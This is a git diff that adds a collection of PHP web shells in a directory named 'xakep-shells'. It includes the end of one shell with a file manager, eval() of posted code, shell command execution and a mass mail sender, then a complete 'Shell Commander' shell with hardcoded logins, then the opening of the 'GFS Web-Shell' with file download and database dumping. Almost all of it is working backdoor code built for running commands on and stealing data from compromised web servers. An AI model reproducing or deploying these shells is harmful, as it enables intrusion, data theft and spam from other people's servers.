+$it=array_keys($ary);
+foreach ($it as $i) {
+echo "<a href=".$surl."?&".$word."&getenv=".$i.">".$i."</a><br>";
+
+}
+exit;
+}
+
+if (isset($_GET['play'])) {
+echo "<embed src=".urlencode($filename)." autostart=true loop=true hidden=true height=0 width=0>";
+exit;
+}
+
+
+if (isset($_GET['special_crypt'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo "<textarea rows=15 cols=90>";
+if (isset($_POST['submit'])) {
+$file=@fopen($_FILES['userfile']['tmp_name'],"r") or die ("[-]Error reading file!");
+$meth=$_POST['crypt'];
+if ($meth=="1") {
+echo htmlspecialchars(md5(fread($file,10000)));
+ } elseif ($meth=="2") {
+      echo htmlspecialchars(crypt(fread($file,10000)));
+}
+    elseif ($meth=="3") {
+     echo htmlspecialchars(sha1(fread($file,10000)));
+  }
+elseif ($meth=="4") {
+     echo htmlspecialchars(crc32(fread($file,10000)));
+}
+   elseif ($meth=="5") {
+     echo htmlspecialchars(urlencode(fread($file,10000)));
+}
+
+   elseif ($meth=="6") {
+     echo htmlspecialchars(urldecode(fread($file,10000)));
+}
+   elseif ($meth=="7") {
+     echo htmlspecialchars(base64_encode(fread($file,10000)));
+}
+
+elseif ($meth=="8") {
+     echo htmlspecialchars(base64_decode(fread($file,10000)));
+}
+
+}
+echo "</textarea><div align=left>";
+
+?>
+<form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&special_crypt method="post">
+file: <input name="userfile" type="file"><br><br>
+
+<input type="submit" value="Start" name="submit"><br>
+<input type=radio name=crypt value=1>md5();<br>
+<input type=radio name=crypt value=2>crypt();<br>
+<input type=radio name=crypt value=3>sha1();<br>
+<input type=radio name=crypt value=4>crc32();<br>
+<input type=radio name=crypt value=5>urlencode();<br>
+<input type=radio name=crypt value=6>urldecode();<br>
+<input type=radio name=crypt value=7>base64_encode();<br>
+<input type=radio name=crypt value=5>base64_decode();<br>
+
+<?php
+exit;
+}
+if (isset($_GET['crypt'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&crypt method="post">
+Crypt:<br>
+<textarea rows=12 cols=120 name=crypt>
+</textarea>
+<?php
+$text=$_POST['crypt'];
+?>
+md5:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(md5($text)) ?>><br><br>
+
+crypt:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(crypt($text)) ?>><br><br>
+
+sha1:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(sha1($text)) ?>><br><br>
+
+crc32:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(crc32($text)) ?>><br><br>
+
+urlencode:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo  htmlspecialchars(urlencode($text)) ?>><br><br>
+
+urldecode:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(urldecode($text)) ?>><br><br>
+
+base64_encode:&ensp;<input type=text size=40 value=<?php echo base64_encode($text) ?>><br><br>
+
+base64_decode:&ensp;<input type=text size=40 value=<?php echo base64_decode($text) ?>><br><br>
+<?php
+echo "<input type=submit value=Start></form><form action=".$surl."?&".$word."&special_crypt method=post><input type=submit value=file_inload_crypt>";
+exit;
+}
+
+if (isset($_GET['php_code'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&php_code method="post">
+
+<textarea rows=12 cols=120 name=code>
+</textarea>
+<textarea rows=12 cols=120 readonly>
+<?php
+eval($_POST['code']);
+echo "</textarea>";
+echo "<br><br><input type=submit value=Start>";
+exit;
+}
+
+if (isset($_GET['search_st'])) {
+   if (isset($_POST['search'])) {
+search_file($_POST['search'],$_POST['dir']);
+ }
+exit;
+}
+
+
+if (isset($_GET['rename_all'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+rename_all(urldecode($_POST['d']),$_POST['prefix'],$_POST['name'],$_POST['del']);
+exit;
+}
+
+if (isset($_GET['special_d'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+ $way=$_POST['way'];
+   if ($way=="1") {
+clear_dir($_GET['file']);
+   exit;
+  }
+    if ($way=="2") {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&rename_all method="post">
+Prefix:<br><input type="text" name="prefix"><br>
+Name:<br><input type="text" name="name"><br>
+<input type="hidden" name="d" value=<?php echo urlencode($filename) ?>>
+Delete old files?:<input type="radio" name="del" value="yes"><br>
+<br><input type="submit" value="Rename">
+<?php
+exit;
+}
+}
+
+
+if (isset($_GET['special_dir'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&special_d&file=<?php echo urlencode($filename) ?> method=post>
+<input type="radio" name="way" value="1">Clear Dir<input type=hidden name=dir value=<?php echo urlencode($filename) ?>><br><br>
+<input type="radio" name="way" value="2">Rename with prefix<br><br>
+<input type="submit" name="sub" value="Start">
+<?php
+exit;
+}
+
+if (isset($_GET['delete'])) {
+   if (@file_exists($filename)) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+    @unlink($filename) or die ("[-]Error deleting file!");
+     echo "Successfully Deleted File!";
+      exit;
+   }
+}
+
+if (isset($_GET['save'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+     write_file(urldecode($_POST['file']),stripslashes($_POST['text']));
+   
+   exit;
+}
+
+if (isset($_GET['exec'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td><center>";
+@chdir(urldecode($_POST['dir']));
+echo "<textarea rows=15 cols=114>";
+echo shell_exec($_POST['command']);
+echo "</textarea>";
+exit;
+}
+
+
+if (isset($_GET['mkdir'])) {
+   if (isset($_POST['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+     mkdir(urldecode($_POST['dir'])."/".$_POST['name']) or die ("[-]Error creating dir!");
+     echo "Successfully created dir!";
+   }
+exit;
+}
+
+if (isset($_GET['mkfile'])) {
+   if (isset($_POST['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+$dir=urldecode($_POST['dir']);
+$filed=$_POST['name'];
+
+       if (@file_exists($dir."/".$filed)) {
+     echo "[-]Allready exists!";
+      exit;
+     }
+    $file_c=@fopen($dir."/".$filed,"w") or die ("[-]Can't create file!");
+     echo "Scuessfully created file(s)!";
+   }
+exit;
+}
+
+if (isset($_GET['edit'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+   if (@file_exists($filename)) {
+     echo "<form action=".$surl."?&".$word."&save method=post><textarea rows=15 cols=90 name=text>";
+      read_file($filename);
+       echo "</textarea><br><br><input type=hidden name=file value=".urlencode($_GET['file'])."><input type=submit name=sub value=Save>";
+       }
+    exit;
+}
+
+
+
+if (isset($_GET['copy_start'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+copy_file($_POST['from'],$_POST['to']);
+exit;
+}
+
+
+
+if (isset($_GET['copy_file']))  {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&copy_start method="post">
+New:<br><textarea rows=4 cols=70 name="to"><?php echo realpath($filename) ?></textarea><br><br>
+Old:<br><textarea rows=4 cols=70 name="from"><?php echo realpath($filename) ?></textarea><br><br>
+<input type="submit" name="sub" value="Copy">
+<?php
+exit;
+}
+
+if (isset($_GET['send_mail_st'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+
+    <tr><td>";
+if (isset($_POST['from'])) 
+{
+if (isset($_POST['to'])) 
+{
+if (isset($_POST['text'])) 
+{
+if (isset($_POST['subject']))
+{
+if (isset($_POST['times']))
+{
+send_mail($_POST['from'],$_POST['to'],$_POST['text'],$_POST['subject'],$_POST['times'])  ; 
+exit;
+}
+}
+}
+}
+}
+}
+if (isset($_GET['send_mail'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&send_mail_st method="post">
+From:&ensp;&ensp;&ensp;&ensp;<input type="text" name="from"><br><br>
+To:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="text" name="to"><br><br>
+Subject:&ensp;&ensp;<input type="text" name="subject"><br><br>
+Times:&ensp;&ensp;&ensp;<input type="text" name="times"><br><br>
+
+Text:<br><textarea rows=15 cols=60 name="text"></textarea><br><br>
+<input type="submit" name="sub" value="Send!">
+<?php
+exit;
+}
+if (isset($_GET['file_browser'])) {
+
+   for ($i=0;$i<4;$i++) {
+     if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+     echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($filename)."&img><img src='".urldecode($surl)."?&".$word."&file=".urldecode($filename)."&img' height= width= border=0><br>";
+  exit;
+}  }
+
+
+
+if (@filetype($j_f)=="file") {
+echo "<center><table border=\"1\" rules=\"groups\" 
+  <thead>
+    <tr><td>";
+highlight_file($j_f);
+
+exit;
+}
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+
+      <th></th><td>";
+count_all($j_d);
+echo "</tr>";
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+      <th>Filename</th><th>Edit</th><th>Copy</th><th>Download</th><th>Delete<th>Perms</th><th>Access</th> ";
+
+
+
+
+$o_d=opendir($j_d);
+
+
+
+   while (false !== ($file = readdir($o_d))) {
+     echo " <tbody>
+
+    <tr>
+      <td>";
+if (@filetype($j_d."/".$file)=="dir") {
+echo "</a><img  src=".$surl."?&".$word."&dir&pic=dir height=12 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[".$file."]";
+} else {
+echo "<img  src=".$surl."?&".$word."&dir&pic=ext_wri height=9 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+echo $file;
+}
+echo "<br></a></td><td><a href=".$surl."&".$word."&edit&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Edit]";
+}
+else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&copy_file&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Copy]";
+} else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&download&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Download]";
+} else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&delete&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Delete]";
+} else {
+echo "</a><center><a href=".$surl."&".$word."&rmdir&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[Delete]</a>";
+} 
+echo "<td><center>";
+echo @fileowner($j_f."/".$file);
+echo "</td>";
+echo "<td><center>";
+get_perms(fileperms($j_f."/".$file));
+echo "</td>";
+echo "</a></td>";
+ }
+echo "<center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&upload method="post">
+file: &ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input name="userfile" type="file">
+<input type="hidden" name="file" value=<?php echo urlencode($_GET['file']) ?>>
+<input type="submit" value="Upload"><br><br><?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+?>
+</form>
+
+<?php
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&search method="post">
+search: &ensp;&ensp;&ensp;&ensp;<input name="search" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="Search">
+</form>
+<?php
+
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+  <thead>
+
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&mkdir method="post">
+name: &ensp;&ensp;&ensp;&ensp;&ensp;<input name="name" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="mkdir">
+</form>
+<?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&mkfile method="post">
+name:&ensp;&ensp;&ensp;&ensp;&ensp; <input name="name" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="mkfile">
+</form>
+<?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&exec method="post">
+command: <input name="command" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="execute">
+</form>
+<?php
+echo "</td><center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+
+      <th></th><td><a href=".$surl."?&".$word."&special_dir&file=".urlencode($filename).">Special DirOptions</a></td> ";
+echo "</a>";
+exit;
+  }
+?>
+
+
+
+<html>
+  <ul id="Navigation">
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&file_browser&file=<?php echo  "." ?>>File_Browser</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&send_mail>Send Mail(s)</a></li>
+
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_code>php_code</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&crypt>crypter</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_info>php_info()</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&defined_vars>defined_vars()</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&env>env()</a></li>
+
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&update>update()</a></li>
+  </ul>
+<center><table border="1" rules="groups">
+  <thead>
+    <tr>
+     <th></th>
+       <td>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&exec_st method="post">
+
+<input type="submit" name="sub" value="Execute"><br>
+<br>
+<input type="text" name="command">
+<br>
+<input type="radio" name="method" value="1">shell_exec();
+<input type="radio" name="method" value="2">system();
+<input type="radio" name="method" value="3">passthru();
+<input type="radio" name="method" value="4">automatic();<br>
+<textarea name="exec" rows=15 cols=90>
+<?php
+if (isset($_GET['exec_st'])) {
+    $meth=$_POST['method'];
+      $com=$_POST['command'];
+        if (isset($meth)) {
+          if ($meth=="1") {
+            echo shell_exec($com);
+              }
+               elseif($meth=="2") {
+                 echo system($com); 
+                   }
+                  elseif ($meth=="3") {
+                    passthru($com);
+                     }
+                       elseif ($meth=="4") {
+                         if (function_exists(shell_exec)) {
+                            echo shell_exec($com);
+                              }
+                                 elseif (function_exists(system)) {
+                                   echo system($com);
+                                     }
+                                       elseif (function_exists(passthru)) {
+                                         echo passthru($com);
+                                           }
+                                             else {
+                                              echo "[-]Error";
+                                             }    
+                                          }
+                                       }
+                                    }
+echo "</textarea>";
+exit;
+?> 
\ No newline at end of file
diff --git a/xakep-shells/PHP/framer.zip b/xakep-shells/PHP/framer.zip
new file mode 100644
index 0000000..dec3c03
Binary files /dev/null and b/xakep-shells/PHP/framer.zip differ
diff --git a/xakep-shells/PHP/fuckphpshell.php.txt b/xakep-shells/PHP/fuckphpshell.php.txt
new file mode 100644
index 0000000..9e14e5d
--- /dev/null
+++ b/xakep-shells/PHP/fuckphpshell.php.txt
@@ -0,0 +1,322 @@
+<?php 
+
+
+error_reporting(0); 
+session_start(); 
+
+unset($user);    // Just in case ;-] 
+unset($pass); 
+
+if ($_POST['cmd']) $_POST['cmd'] = my_encode($_POST['cmd']); 
+
+$cache_lines = 1000; 
+$history_lines = 100;    
+$history_chars = 20;                            
+
+$user[] = "root";        $pass[] = md5("fuckyou");    
+$user[] = "user";      $pass[] = md5("fuckhacker"); 
+
+$alias = array( 
+    "la"    => "ls -la", 
+    "rf"    => "rm -f", 
+    "unbz2" => "tar -xjpf", 
+    "ungz"  => "tar -xzpf" 
+); 
+
+
+
+if (!$_SESSION['user']) { 
+
+    $pr_login = "Login:\n"; 
+    $pr_pass = "Password:\n"; 
+    $err = "Invalid login!\n\n"; 
+    $succ = "Warning! 
+Don`t be stupid .. this is a priv3 server, so take extra care!!!\n\n"; 
+
+    if ($_SESSION['login'] && $_POST['cmd']) { // WE HAVE USERNAME & PASSWORD 
+
+        $_SESSION['output'] .= $pr_pass; 
+
+        if (in_array($_SESSION['login'], $user)) { //........ USERNAME EXISTS 
+
+            $key = array_search($_SESSION['login'], $user); 
+
+            if ($pass[$key] != md5($_POST['cmd'])) { //....... WRONG PASSWORD 
+                $_SESSION['output'] .= $err; 
+                unset($_SESSION['login']); 
+                $prompt = $pr_login; 
+
+            } else { //..................................... SUCCESSFUL LOGIN 
+                $_SESSION['user'] = $_SESSION['login']; 
+                $_SESSION['whoami'] = substr(shell_exec("whoami"), 0, -1); 
+                $_SESSION['host'] = substr(shell_exec("uname -n"), 0, -1); 
+                $_SESSION['dir'] = substr(shell_exec("pwd"), 0, -1); 
+                $_SESSION['output'] .= $succ; 
+                $prompt = set_prompt(); 
+                unset($_SESSION['login']); 
+            } 
+
+        } else { //......................................... NO SUCH USERNAME 
+            $_SESSION['output'] .= $err; 
+            unset($_SESSION['login']); 
+            $prompt = $pr_login; 
+        } 
+
+    } else { //................................................ LOGIN PROCESS 
+
+        if (!$_SESSION['login'] && !$_POST['cmd']) $prompt = $pr_login; 
+
+        if (!$_SESSION['login'] && $_POST['cmd']) { 
+            $_SESSION['login'] = $_POST['cmd']; 
+            $_SESSION['output'] .= substr($pr_login, 0, -1) . " $_POST[cmd]\n"; 
+            $prompt = $pr_pass; 
+        } 
+    } 
+
+} else { //........................................................ LOGGED IN 
+
+
+
+                            /*=-- MEMBERS AREA --=*\ 
+                            \*=-- MEMBERS AREA --=*/ 
+
+
+    $prompt = set_prompt(); 
+
+    chdir($_SESSION['dir']); 
+
+    if ($_REQUEST['clear_hist']) //............................ CLEAR HISTORY 
+        $_SESSION['history'] = ""; 
+
+    if ($_SESSION['history']) $hist_arr = explode("\n", $_SESSION['history']); 
+
+    if ($_POST['cmd']) { 
+
+        if (!in_array($_POST['cmd'], $hist_arr)) { //......... ADD TO HISTORY 
+            $hist_arr[] = $_POST['cmd']; 
+            $_SESSION['history'] = implode("\n", $hist_arr); 
+        } 
+
+        if (count($hist_arr) > $history_lines) { //........... CUTOFF HISTORY 
+            $start = count($hist_arr) - $history_lines; 
+            $_SESSION['history'] = ""; 
+
+            for ($i = $start; $i < count($hist_arr); $i++) 
+                $_SESSION['history'] .= $hist_arr[$i] . "\n"; 
+
+            $_SESSION['history'] = substr($_SESSION['history'], 0, -1); 
+            $hist_arr = explode("\n", $_SESSION['history']); 
+        } 
+
+        $first_word = first_word($_POST['cmd']); 
+
+        if (array_key_exists($first_word, $alias)) { //. CHECKING FOR ALIASES 
+            $_POST['cmd'] = $alias[$first_word] . substr($_POST['cmd'], strlen($first_word)); 
+            $first_word = first_word($_POST['cmd']); 
+        } 
+
+        switch ($first_word) { 
+
+          case "clear": 
+            $_SESSION['output'] = ""; 
+            break; 
+
+          case "exit": 
+            session_destroy(); 
+            refresh(); 
+            break; 
+
+          case "cd": 
+            $_SESSION['output'] .= $prompt; 
+            $result = shell_exec($_POST['cmd'] . " 2>&1 ; pwd"); 
+            $result = explode("\n", $result); 
+            $_SESSION['dir'] = $result[count($result) - 2]; 
+
+            if (count($result) > 2) //.............. WE HAVE AN ERROR MESSAGE 
+                $result[0] = "\n" . substr($result[0], strpos($result[0], "cd: ")) . "\n"; 
+            else $result[0] = "\n"; 
+
+            $prompt = set_prompt(); 
+            $_SESSION['output'] .= $_POST['cmd'] . $result[0]; 
+            break; 
+
+          default: 
+            $result = shell_exec($_POST['cmd'] . " 2>&1"); 
+
+            if (substr($result, -1) != "\n") $result .= "\n"; 
+            $_SESSION['output'] .= $prompt . $_POST['cmd'] . "\n" . $result; 
+
+            $rows = preg_match_all('/\n/', $_SESSION['output'], $arr); 
+            unset($arr); 
+
+            if ($rows > $cache_lines) { 
+                preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['output'], $out); 
+                $_SESSION['output'] = $out[0] . "\n"; 
+            } 
+        } 
+    } 
+} 
+
+
+
+                             /*=-- FUNCTIONS --=*\ 
+                             \*=-- FUNCTIONS --=*/ 
+
+
+function my_encode($str) { 
+    $str = str_replace("\\\\", "\\", $str); 
+    $str = str_replace("\\\"", "\"", $str); 
+    $str = str_replace("\\'", "'", $str); 
+
+    while (strpos($str, "  ") !== false) $str = str_replace("  ", " ", $str); 
+
+    return rtrim(ltrim($str)); 
+} 
+
+function set_prompt() { 
+    global $_SESSION; 
+
+    return $_SESSION['whoami'] . "@" . $_SESSION['host'] . " " . substr($_SESSION['dir'], strrpos($_SESSION['dir'], "/") + 1) . " $ "; 
+} 
+
+function first_word($str) { 
+    list($str) = preg_split('/[ ;]/', $str); 
+    return $str; 
+} 
+
+function refresh() { 
+    global $_SERVER; 
+
+    $self = substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], "/") + 1); 
+    header("Location: $self"); 
+    die; 
+} 
+
+
+
+                             /*=-- HTML PAGE --=*\ 
+                             \*=-- HTML PAGE --=*/ 
+
+
+$out = substr(preg_replace('/<\/(textarea)/i', '&lt;/\1', $_SESSION['output']), 0, -1); 
+
+?><HTML> 
+<HEAD> 
+
+  <TITLE>Shell Commander</TITLE> 
+  <STYLE TYPE="text/css"><!-- 
+
+    INPUT, TEXTAREA, SELECT, OPTION, TD { 
+        color: #BBBBBB; 
+        background-color: #000000; 
+        font-family: Terminus, Fixedsys, Fixed, Terminal, Courier New, Courier; 
+    } 
+
+    TEXTAREA { 
+        overflow-y: auto; 
+        border-width: 0px; 
+        height: 100%; 
+        width: 100%; 
+        padding: 0px; 
+    } 
+
+    INPUT { 
+        border-width: 0px; 
+        height: 26px; 
+        width: 100%; 
+        padding-top: 5px; 
+    } 
+
+    SELECT, OPTION { 
+        color: #000000; 
+        background-color: #BBBBBB; 
+    } 
+
+    BODY { 
+        overflow-y: auto; 
+        margin: 0; 
+    } 
+
+  --></STYLE> 
+  <SCRIPT LANGUAGE="JavaScript"><!-- 
+
+hist_arr = new Array(); 
+
+<?php 
+
+foreach ($hist_arr as $key => $value) { 
+    $value = str_replace("\\", "\\\\", $value); 
+    $value = str_replace("\"", "\\\"", $value); 
+    echo "hist_arr[$key] = \"$value\";\n"; 
+} 
+
+?> 
+
+function parse_hist(key) { 
+    if (key < hist_arr.length) { 
+        if (key != "") { 
+            document.getElementById('input').value = hist_arr[key]; 
+            document.getElementById('input').focus(); 
+        } 
+    } else { 
+        window.location.href = "?clear_hist=1"; 
+    } 
+} 
+
+function input_focus() { 
+    document.getElementById('input').focus(); 
+} 
+
+function selection_to_clipboard() { // IE only! 
+    if (window.clipboardData && document.selection) 
+        window.clipboardData.setData("Text", document.selection.createRange().text); 
+} 
+
+if (window.clipboardData) 
+    document.oncontextmenu = new Function("document.getElementById('input').value = window.clipboardData.getData('Text'); input_focus(); return false"); 
+
+  --></SCRIPT> 
+</HEAD> 
+<BODY onLoad="document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; input_focus()" TOPMARGIN="0" LEFTMARGIN="0"> 
+<TABLE CELLPADDING="0" CELLSPACING="0" BORDER="0" HEIGHT="100%" WIDTH="100%"> 
+<TR> 
+  <TD HEIGHT="100%" BGCOLOR="#000000" STYLE="padding-top: 5px; padding-left: 5px; padding-right: 5px; padding-bottom: 0px"><TEXTAREA ID="output" onSelect="selection_to_clipboard()" onClick="input_focus()" READONLY><?= $out ?></TEXTAREA></TD> 
+</TR> 
+
+<TR> 
+  <TD BGCOLOR="#000000"><TABLE CELLPADDING="0" CELLSPACING="5" BORDER="0" WIDTH="100%"> 
+    <TR> 
+    <FORM METHOD="POST" ACTION=""> 
+      <TD NOWRAP onClick="input_focus()"><?= substr($prompt, 0, -1) ?></TD> 
+      <TD WIDTH="100%"><INPUT ID="input" TYPE="<?= (!$_SESSION['user'] && $_SESSION['login']) ? 'PASSWORD' : 'TEXT' ?>" NAME="cmd"></TD> 
+    </FORM><?php 
+
+if ($hist_arr) { 
+
+    ?><TD NOWRAP><SELECT onChange="parse_hist(this.options[this.selectedIndex].value)"> 
+        <OPTION VALUE="">--- HISTORY</OPTION><?php 
+
+    for ($i = count($hist_arr) - 1; $i >= 0; $i--) { 
+
+        if (strlen($hist_arr[$i]) > $history_chars) $option = substr($hist_arr[$i], 0, $history_chars - 3) . "..."; 
+        else $option = $hist_arr[$i]; 
+
+        echo "<OPTION VALUE=\"" . $i . "\">$option</OPTION>"; 
+    } 
+
+      ?><OPTION VALUE="<?= $history_lines + 1 ?>">--- CLEAR HISTORY</OPTION></SELECT></TD><?php 
+
+} 
+
+  ?></TR> 
+
+  </TABLE></TD> 
+</TR> 
+</TABLE> 
+
+<SCRIPT LANGUAGE="JavaScript"><!-- 
+document.getElementById('output').scrollTop = document.getElementById('output').scrollHeight; 
+--></SCRIPT> 
+
+</BODY> 
+</HTML>
\ No newline at end of file
diff --git a/xakep-shells/PHP/gfs_sh.php.php.txt b/xakep-shells/PHP/gfs_sh.php.php.txt
new file mode 100644
index 0000000..6ac5420
--- /dev/null
+++ b/xakep-shells/PHP/gfs_sh.php.php.txt
@@ -0,0 +1,1575 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
